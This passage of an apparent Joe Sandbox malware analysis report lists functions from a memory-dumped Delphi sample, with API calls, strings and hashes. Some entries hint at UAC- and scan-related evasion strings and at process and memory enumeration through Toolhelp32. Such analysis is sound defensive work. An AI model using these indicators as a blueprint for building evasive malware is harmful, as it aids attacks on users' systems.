Part of subcall function 02935A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02935AEE
Part of subcall function 02935A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02935B37
Part of subcall function 02935A78: RegQueryValueExA.ADVAPI32(?,02935CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001), ref: 02935B55
Part of subcall function 02935A78: RegCloseKey.ADVAPI32(?,02935B84,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02935B77

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: e62c89e50368be2d7adc044f3fd8f499c6fd9d175c2a7ea7e898607661c9eff7
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction Fuzzy Hash: F6E065B1A002148BCB11DEA888C0AA737D8AB0C750F8109A5EC58DF34AD3B0DD208BE0

Function 02937D94 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02937DA8

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction ID: f56be3867a0ba4cc0a0402974fc1d7cf0f716b0727e60a32ba3aee8e2a855b5a
Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction Fuzzy Hash: D4D05BB23081107AD220955E5C44EFB5BDCCFC9770F100639B668C7180D7208C0187B1

Function 02937E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0294FD00,ScanString,0299237C,0295B40C,OpenSession,0299237C,0295B40C,ScanString,0299237C,0295B40C,UacScan,0299237C,0295B40C,UacInitialize), ref: 02937E1B

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction ID: b3d9356ece30e21b5970ceebb9d23ec5382e0fefaff7fcb2ad4f9885b9743b76
Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction Fuzzy Hash: BCC08CE12023020A1A62B1FC0CC40AA42CC49842383A42F31E238EA2F2D32188232420

Function 02937E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02952E7D,ScanString,0299237C,0295B40C,OpenSession,0299237C,0295B40C,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,Initialize), ref: 02937E3F

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
Instruction ID: 1fa2da45941921ef0d145b117b7f483cfb7a3de814fa0be1309934cad036a830
Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
Instruction Fuzzy Hash: B0C08CE12023040E1E62E2FC4CC458B42CC49842383A12F31E13CDA2E2D321D8622410

Function 02934C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02934C37

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
Instruction ID: 563cb31c968388f225178d87cbc84b6bd5d7961395f58ae05de9ad4380fbf120
Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
Instruction Fuzzy Hash: B1C012A260022447EF225A989CC079562CCEB45295B1510A1D408D7250E3A49C004A64

Function 02934C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0294ED84), ref: 02934C1A
SysReAllocStringLen.OLEAUT32(0295C2B4,0294ED84,000000B4), ref: 02934C62

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
Instruction ID: 6cf23a0179406adc89336559fa3dea393fc99050092ca2eae8ecc7351abc6cca
Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
Instruction Fuzzy Hash: DDD080745001015DAF2F9E5549449B7737EADD130634FE65DDC024E250EB25CC00CA31

Function 0295BF84 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,0295BF78,00000000,00000001), ref: 0295BF94

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 8dc8b98cef2cbaef1e7db16173ec5bfdbd8a45a93734ad130520f42d2731cd4d
Instruction ID: 5dbbbdef20995e92d29a85d4d0b2ac1dee385b54added8b8386047edd064905e
Opcode Fuzzy Hash: 8dc8b98cef2cbaef1e7db16173ec5bfdbd8a45a93734ad130520f42d2731cd4d
Instruction Fuzzy Hash: 4AC048F17883407AFA10A6A92CD2F77218DD344B02F200862BE04AE2C1D6A2A8504A20

Function 02934BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02934BEB

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction ID: 5757340d3c46417871550e7ea9eba3ff9e2e61659c9a9d1cdb6509046891c1bb
Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction Fuzzy Hash: 28B0123C64820218FB1316610D00BBB00AC5F91387F8620959E38C80D0FF00C4108832

Function 02934BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02934C03

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction ID: fc6315be2a3ab78e9e9dd5ca11348f9c2f5cc95ccf1093f0a3bdd6006d7c504a
Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction Fuzzy Hash: DCA022AC0003030A8F0B232C000002A203B3FE03003CBC0E800000A0208F3AC000AC30

Function 029315CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02931A03,?,02932000), ref: 029315E2

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3fac4547f5151b99e878b23b9e9e1354f227560035d0a5f6c1db0a1f4c41b9ac
Instruction ID: b71aea59219c48c7cef2ed67db35a1d3d10101dc0c2ec544d2a029e7029fa3ce
Opcode Fuzzy Hash: 3fac4547f5151b99e878b23b9e9e1354f227560035d0a5f6c1db0a1f4c41b9ac
Instruction Fuzzy Hash: 50F049F1B453004FEF06DF799D403117AD6EB89348FA89579D609DB798E77184018B00

Function 02931682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02932000), ref: 029316A4

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 10859e94f7e720b6348780fa0979f186c66914974d6f0c16530187f0390fd8fa
Instruction ID: 5b1bfc3dfb7bdfac4c354421d1cc4c8fb1f55b2161a2db3e89fcd4198c264449
Opcode Fuzzy Hash: 10859e94f7e720b6348780fa0979f186c66914974d6f0c16530187f0390fd8fa
Instruction Fuzzy Hash: C0F0BEB2F447966BD7119F9E9C80B92BBE8FB40365F054239FA0C9B340D771A8508B94

Function 029316E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 02931704

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a8e4af2cc0060b8db69c187e96a3531ad7a239984eaa12b5d229a9a195b542a0
Instruction ID: a7c97e71bddde4092439459308a00a0c5cc4e8c60a7be743250eaade6f14c323
Opcode Fuzzy Hash: a8e4af2cc0060b8db69c187e96a3531ad7a239984eaa12b5d229a9a195b542a0
Instruction Fuzzy Hash: 02E0CD753003016FD7115B7D5D407137BDCFB84664F184475F50ADB261D660E8108B64

Non-executed Functions

Function 0294A954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0294ABDB,?,?,0294AC6D,00000000,0294AD49), ref: 0294A968
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0294A980
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0294A992
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0294A9A4
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0294A9B6
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0294A9C8
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0294A9DA
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0294A9EC
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0294A9FE
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0294AA10
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0294AA22
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0294AA34
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0294AA46
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0294AA58
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0294AA6A
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0294AA7C
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0294AA8E

Strings

Process32Next, xrefs: 0294A9F6
CreateToolhelp32Snapshot, xrefs: 0294A978
kernel32.dll, xrefs: 0294A963
Process32FirstW, xrefs: 0294AA08
Process32First, xrefs: 0294A9E4
Heap32ListNext, xrefs: 0294A99C
Thread32Next, xrefs: 0294AA3E
Heap32ListFirst, xrefs: 0294A98A
Module32Next, xrefs: 0294AA62
Module32FirstW, xrefs: 0294AA74
Module32First, xrefs: 0294AA50
Toolhelp32ReadProcessMemory, xrefs: 0294A9D2
Heap32Next, xrefs: 0294A9C0
Thread32First, xrefs: 0294AA2C
Process32NextW, xrefs: 0294AA1A
Module32NextW, xrefs: 0294AA86
Heap32First, xrefs: 0294A9AE

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 9565a89c01c0eb50975e41cc2f9aae960c6a2497786a11bda91e4937865ce8ee
Instruction ID: f47dc90150c6334920dfab642636a63b578d74331ee789b89276d409054b2c7c
Opcode Fuzzy Hash: 9565a89c01c0eb50975e41cc2f9aae960c6a2497786a11bda91e4937865ce8ee
Instruction Fuzzy Hash: 983191B1DC5B20BFFB12DFB8D8B5E2737AEEB857547000965A401CF244DA7498508F96

Function 029358B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02937330,02930000,0295E790), ref: 029358D1
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029358E8
lstrcpynA.KERNEL32(?,?,?), ref: 02935918
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02937330,02930000,0295E790), ref: 0293597C
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02937330,02930000,0295E790), ref: 029359B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02937330,02930000,0295E790), ref: 029359C5
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02937330,02930000,0295E790), ref: 029359D7
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02937330,02930000,0295E790), ref: 029359E3
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02937330,02930000), ref: 02935A17
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02937330), ref: 02935A23
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02935A45

Strings

kernel32.dll, xrefs: 029358CC
GetLongPathNameA, xrefs: 029358DF
\, xrefs: 029359F5

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: cf9783aafdd26a10d438f85a1d0eeedb19ae0d70007c05b693ab0189ebb1114d
Instruction ID: d52e4841e42aefbc9998abab40c90579ae68a7a64e4ab488a1ed83e791415c94
Opcode Fuzzy Hash: cf9783aafdd26a10d438f85a1d0eeedb19ae0d70007c05b693ab0189ebb1114d
Instruction Fuzzy Hash: AD416CB2D00259AFDB12DAE8CC88ADEB3BEAB4C350F4545A5E548E7251E7709E44CF50

Function 02935B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02935B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02935BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02935BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02935BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02935C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02935C97

Strings

Software\Borland\Locales, xrefs: 02935AA8, 02935AC6
Software\Borland\Delphi\Locales, xrefs: 02935AE4

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction ID: d27c58e2ba9abb3e1e73786c92812ce2aea1c9d9cbbcc70e761f562873db2343
Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction Fuzzy Hash: 5031C471E4021C2AEF27D6B89C85FEF77AD9B48384F4501E19608E6084DB749E848F90

Function 02937F52 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02937F75

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
Instruction ID: 502bd337b3bbea4d4c80d4fddbe97004fbabe814b580a8f14d86422d5e346825
Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
Instruction Fuzzy Hash: 4C1100B5A00209AFDB05CF99C8809AFF7F9FFCC304B14C569A504EB254E6319E01CB90

Function 0293A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

